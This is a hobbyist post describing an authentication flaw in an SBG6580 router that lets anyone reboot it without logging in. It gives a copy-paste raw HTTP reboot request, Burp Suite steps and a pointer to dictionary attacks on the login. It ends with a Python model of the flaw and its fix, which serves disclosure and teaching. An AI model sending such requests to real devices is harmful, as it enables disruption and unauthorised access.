So, I was playing around with Burpsuite a bit to see if I could screw with my modem/router gateway thing to bypass the credentials. No dice there.
Nonetheless, I did find that I could reboot the router without being logged in.
Here's a step-by-step:
- Enter your browser's network settings and turn on the proxy. Use 127.0.0.1:8080. Ensure you don't have any options/checkboxes set for bypassing the proxy for localhost (set by default in Iceweasel 31.7 on Kali).
- Launch Burpsuite. Go to the Proxy tab and the Intercept sub-tab. Ensure you see "Intercept is On". Then go to the Options sub-tab and ensure the "Running" checkbox is set for 127.0.0.1.
- Go to your browser and enter the SBG6580's IP address. By default, it's 192.168.0.1.
Optionally, you can right-click in the textbox and choose "Send to Intruder" if you want to try dictionary attacks on the credentials (Google burpsuite cluster bomb).
To reboot the modem, just copy/paste the following text in place of whatever request you've intercepted.
```
POST /goform/RgConfiguration HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.1/RgConfiguration.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

SaveChanges=Reboot
```
To get this, I logged in normally (just forwarded those requests normally) and went to the Configuration page. I clicked "Reboot" but copied that text and just dropped the request. I then used the browser back button to get back to the interface and hit Logout (forwarding the requests normally again) and went back to the login page. Now, without being logged in, I just pasted the request for the reboot and forwarded it. It rebooted even though I wasn't logged in.
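The behaviour described above, modelled as an added example (not the SBG6580 firmware and not code from the original post): pages are gated by the login, but the `/goform/` handler acts without checking the session, and the corrected variant checks it before any handler runs. The `Gateway` class, session tracking by client IP, the status codes and the client address are assumptions made for illustration.

```python
from urllib.parse import parse_qs

# Constructed from the request on this page (trimmed to the headers that matter).
REBOOT = ("POST /goform/RgConfiguration HTTP/1.1\r\nHost: 10.0.0.1\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n"
          "Content-Length: 18\r\n\r\nSaveChanges=Reboot")
PAGE = "GET /RgConfiguration.asp HTTP/1.1\r\nHost: 10.0.0.1\r\n\r\n"

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (h.split(":", 1) for h in header_lines)}
    if int(headers.get("content-length", 0)) != len(body.encode()):
        raise ValueError("Content-Length does not match body length")
    return method, path, parse_qs(body)

class Gateway:
    """Toy admin interface; sessions keyed by client IP (an assumption)."""
    def __init__(self, gate_form_handlers):
        self.gate_form_handlers = gate_form_handlers
        self.sessions = set()
        self.reboots = 0

    def login(self, ip):
        self.sessions.add(ip)

    def logout(self, ip):
        self.sessions.discard(ip)

    def handle(self, ip, raw):
        method, path, form = parse_request(raw)
        authed = ip in self.sessions
        if path.endswith(".asp"):
            # Pages are gated in both variants: the login itself held up.
            return 200 if authed else 302
        if path.startswith("/goform/"):
            # The fix: check the session before any form handler runs.
            if self.gate_form_handlers and not authed:
                return 401
            if (method == "POST" and path == "/goform/RgConfiguration"
                    and form.get("SaveChanges") == ["Reboot"]):
                self.reboots += 1   # stands in for the real reboot
                return 200
        return 404
```

With `Gateway(False)` the logged-out replay of `REBOOT` is accepted even though `PAGE` redirects to the login; with `Gateway(True)` the same replay is refused until the client logs in again.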